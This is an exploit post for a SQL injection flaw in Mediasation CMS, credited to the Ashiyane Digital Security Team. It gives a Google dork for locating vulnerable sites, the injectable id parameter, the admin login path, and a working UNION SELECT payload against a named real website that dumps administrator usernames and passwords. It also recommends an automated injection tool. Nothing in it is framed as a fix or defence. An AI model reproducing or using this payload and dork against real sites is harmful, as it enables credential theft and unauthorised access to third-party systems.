facebook facebook twitter rss

Mediasation CMS SQL Injection Vulnerability

Author: Ashiyane Digital Security Team , Published: 24-03-2013
###############################################
# Exploit Title : Mediasation CMS SQL Injection Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Home : www.Ashiyane.org
#
# Security Risk : Medium - SQL Injection
#
# Vendor Page : www.mediasation.com
#
# Google Dork :" CMS by Mediasation" &"id="
#
#################################################
# vul location: Http://site/*.php?id=[SQLi]
#
# Admin Page : Http://site/login.php
#
# DEMO:
# ------------------------------------------------------------------------------------
# | www.covenantdove.com/facility-details.php?id=31 |
# | www.covenantdove.com/facility-details.php?id=-31%27%20UNION%20SELECT%201,group_concat%28username,0x3a,0x3a,password%29,
# | 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20admin_users--+
# ------------------------------------------------------------------------------------
#
# [ for inject use Havij OR inject manually ]
#
# Spacial TnX : Reza-S4T4n ,C4T , TrojanMan
# Alireza666 , milvar , Remove , B4b4K KH4TaR ,
# PrinceofHacking , sil3nt ,...
#################################################
# Greetz to: My Lord ALLAH
#################################################
#
# bY T3rm!nat0r5
#
#################

Like us on Facebook :